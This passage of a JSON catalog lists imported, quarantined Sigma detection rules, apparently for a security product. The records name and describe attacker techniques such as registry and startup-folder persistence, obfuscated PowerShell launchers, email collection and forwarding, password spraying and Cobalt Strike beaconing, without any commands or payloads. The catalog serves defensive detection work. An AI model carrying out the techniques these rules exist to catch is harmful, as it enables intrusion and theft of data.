"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_dumpert.yml" } }, { "id": "sigmahq-sigma-272e55a4-9e6b-4211-acb6-78f51f0b1b40", "type": "detection", "name": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/folder-removed-from-exploit-guard-protectedfolders-list-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" } }, { "id": "sigmahq-sigma-273a8dd8-3742-4302-bcc7-7df5a80fe425", "type": "detection", "name": "VMMap Unsigned Dbghelp.DLL Potential Sideloading", "description": "Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vmmap-unsigned-dbghelp-dll-potential-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "273a8dd8-3742-4302-bcc7-7df5a80fe425", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml" } }, { "id": "sigmahq-sigma-275641a5-a492-45e2-a817-7c81e9d9d3e9", "type": "detection", "name": "Add DisallowRun Execution to Registry", "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-disallowrun-execution-to-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" } }, { "id": "sigmahq-sigma-277a4393-446c-449a-b0ed-7fdc7795244c", "type": "detection", "name": "Renamed FTP.EXE Execution", "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-ftp-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "277a4393-446c-449a-b0ed-7fdc7795244c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_ftp.yml" } }, { "id": "sigmahq-sigma-277efb8f-60be-4f10-b4d3-037802f37167", "type": "detection", "name": "Registry Persistence Mechanisms in Recycle Bin", "description": "Detects persistence registry keys for Recycle Bin", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-persistence-mechanisms-in-recycle-bin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "277efb8f-60be-4f10-b4d3-037802f37167", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" } }, { "id": "sigmahq-sigma-2782fbd8-b662-4eb5-9962-5bfbfb671e7b", "type": "detection", "name": "Suspicious Usage of For Loop with Recursive Directory Search in CMD", "description": "Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing.\nThis pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection.\nThis behavior has been observed in various malicious lnk files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-usage-of-for-loop-with-recursive-directory-search-in-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2782fbd8-b662-4eb5-9962-5bfbfb671e7b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_cmd_for_loop_execution_with_recursive_directory_search.yml" } }, { "id": "sigmahq-sigma-27aec9c9-dbb0-4939-8422-1742242471d0", "type": "detection", "name": "Invoke-Obfuscation VAR+ Launcher", "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "27aec9c9-dbb0-4939-8422-1742242471d0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml" } }, { "id": "sigmahq-sigma-27ba3207-dd30-4812-abbf-5d20c57d474e", "type": "detection", "name": "Suspicious Chromium Browser Instance Executed With Custom Extension", "description": "Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1176.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-chromium-browser-instance-executed-with-custom-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "27ba3207-dd30-4812-abbf-5d20c57d474e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml" } }, { "id": "sigmahq-sigma-27e4f1d6-ae72-4ea0-8a67-77a73a289c3d", "type": "detection", "name": "Suspicious Inbox Forwarding Identity Protection", "description": "Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1114.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-inbox-forwarding-identity-protection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "27e4f1d6-ae72-4ea0-8a67-77a73a289c3d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_inbox_forwarding_rule.yml" } }, { "id": "sigmahq-sigma-27ee9438-90dc-4bef-904b-d3ef927f5e7e", "type": "detection", "name": "Windows Kernel Debugger Execution", "description": "Detects execution of the Windows Kernel Debugger \"kd.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-kernel-debugger-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "27ee9438-90dc-4bef-904b-d3ef927f5e7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_kd_execution.yml" } }, { "id": "sigmahq-sigma-28036918-04d3-423d-91c0-55ecf99fb892", "type": "detection", "name": "NET NGenAssemblyUsageLog Registry Key Tamper", "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/net-ngenassemblyusagelog-registry-key-tamper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28036918-04d3-423d-91c0-55ecf99fb892", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml" } }, { "id": "sigmahq-sigma-28208707-fe31-437f-9a7f-4b1108b94d2e", "type": "detection", "name": "Suspicious Startup Folder Persistence", "description": "Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors.\nThese files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers.\nThis technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-startup-folder-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28208707-fe31-437f-9a7f-4b1108b94d2e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml" } }, { "id": "sigmahq-sigma-28268a8f-191f-4c17-85b2-f5aa4fa829c3", "type": "detection", "name": "Google Cloud DNS Zone Modified or Deleted", "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-dns-zone-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_dns_zone_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-2837e152-93c8-43d2-85ba-c3cd3c2ae614", "type": "detection", "name": "Powershell Local Email Collection", "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-local-email-collection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" } }, { "id": "sigmahq-sigma-285b85b1-a555-4095-8652-a8a4106af63f", "type": "detection", "name": "Suspicious Rundll32 Setupapi.dll Activity", "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rundll32-setupapi-dll-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "285b85b1-a555-4095-8652-a8a4106af63f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml" } }, { "id": "sigmahq-sigma-286b47ed-f6fe-40b3-b3a8-35129acd43bc", "type": "detection", "name": "Suspicious Access to Sensitive File Extensions - Zeek", "description": "Detects known sensitive file extensions via Zeek", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-access-to-sensitive-file-extensions-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "286b47ed-f6fe-40b3-b3a8-35129acd43bc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml" } }, { "id": "sigmahq-sigma-28870ae4-6a13-4616-bd1a-235a7fad7458", "type": "detection", "name": "Failed Authentications From Countries You Do Not Operate Out Of", "description": "Detect failed authentications from countries you do not operate out of.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/failed-authentications-from-countries-you-do-not-operate-out-of.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28870ae4-6a13-4616-bd1a-235a7fad7458", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" } }, { "id": "sigmahq-sigma-288a39fc-4914-4831-9ada-270e9dc12cb4", "type": "detection", "name": "Azure Active Directory Hybrid Health AD FS New Server", "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.\nThis can be done programmatically via HTTP requests to Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1578" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-active-directory-hybrid-health-ad-fs-new-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "288a39fc-4914-4831-9ada-270e9dc12cb4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_new_server.yml" } }, { "id": "sigmahq-sigma-28a452f3-786c-4fd8-b8f2-bddbe9d616d1", "type": "detection", "name": "Creation of WerFault.exe/Wer.dll in Unusual Folder", "description": "Detects the creation of a file named \"WerFault.exe\" or \"wer.dll\" in an uncommon folder, which could be a sign of WerFault DLL hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-of-werfault-exe-wer-dll-in-unusual-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" } }, { "id": "sigmahq-sigma-28ac00d6-22d9-4a3c-927f-bbd770104573", "type": "detection", "name": "RestrictedAdminMode Registry Value Tampering - ProcCreation", "description": "Detects changes to the \"DisableRestrictedAdmin\" registry value in order to disable or enable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/restrictedadminmode-registry-value-tampering-proccreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml" } }, { "id": "sigmahq-sigma-28c8f68b-098d-45af-8d43-8089f3e35403", "type": "detection", "name": "Potential Register_App.Vbs LOLScript Abuse", "description": "Detects potential abuse of the \"register_app.vbs\" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-register-app-vbs-lolscript-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28c8f68b-098d-45af-8d43-8089f3e35403", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolscript_register_app.yml" } }, { "id": "sigmahq-sigma-28ecba0a-c743-4690-ad29-9a8f6f25a6f9", "type": "detection", "name": "Password Spray Activity", "description": "Indicates that a password spray attack has been successfully performed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-spray-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28ecba0a-c743-4690-ad29-9a8f6f25a6f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_password_spray.yml" } }, { "id": "sigmahq-sigma-28eea407-28d7-4e42-b0be-575d5ba60b2c", "type": "detection", "name": "Azure AD Only Single Factor Authentication Required", "description": "Detect when users are authenticating without MFA being required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-ad-only-single-factor-authentication-required.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "28eea407-28d7-4e42-b0be-575d5ba60b2c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_only_single_factor_auth_required.yml" } }, { "id": "sigmahq-sigma-2953194b-e33c-4859-b9e8-05948c167447", "type": "detection", "name": "DD File Overwrite", "description": "Detects potential overwriting and deletion of a file using DD.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dd-file-overwrite.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2953194b-e33c-4859-b9e8-05948c167447", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml" } }, { "id": "sigmahq-sigma-295a59c1-7b79-4b47-a930-df12c15fc9c2", "type": "detection", "name": "Windows Registry Trust Record Modification", "description": "Alerts on trust record modification within the registry, indicating usage of macros", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-registry-trust-record-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_office_trust_record_modification.yml" } }, { "id": "sigmahq-sigma-295c9289-acee-4503-a571-8eacaef36b28", "type": "detection", "name": "Vulnerable HackSys Extreme Vulnerable Driver Load", "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vulnerable-hacksys-extreme-vulnerable-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "295c9289-acee-4503-a571-8eacaef36b28", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_vuln_hevd_driver.yml" } }, { "id": "sigmahq-sigma-297241f3-8108-4b3a-8c15-2dda9f844594", "type": "detection", "name": "Suspicious Invocation of Shell via Rsync", "description": "Detects the execution of a shell as sub process of \"rsync\" without the expected command line flag \"-e\" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-invocation-of-shell-via-rsync.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "297241f3-8108-4b3a-8c15-2dda9f844594", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml" } }, { "id": "sigmahq-sigma-2975af79-28c4-4d2f-a951-9095f229df29", "type": "detection", "name": "Cobalt Strike DNS Beaconing", "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cobalt-strike-dns-beaconing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2975af79-28c4-4d2f-a951-9095f229df29", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/dns/net_dns_mal_cobaltstrike.yml" } }, { "id": "sigmahq-sigma-297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", "type": "detection", "name": "New Connection Initiated To Potential Dead Drop Resolver Domain", "description": "Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.\nIn this context attackers leverage known websites such as \"facebook\", \"youtube\", etc. In order to pass through undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1102", "T1102.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-connection-initiated-to-potential-dead-drop-resolver-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_dead_drop_resolvers.yml" } }, { "id": "sigmahq-sigma-2992ac4d-31e9-4325-99f2-b18a73221bb2", "type": "detection", "name": "ESXi VM Kill Via ESXCLI", "description": 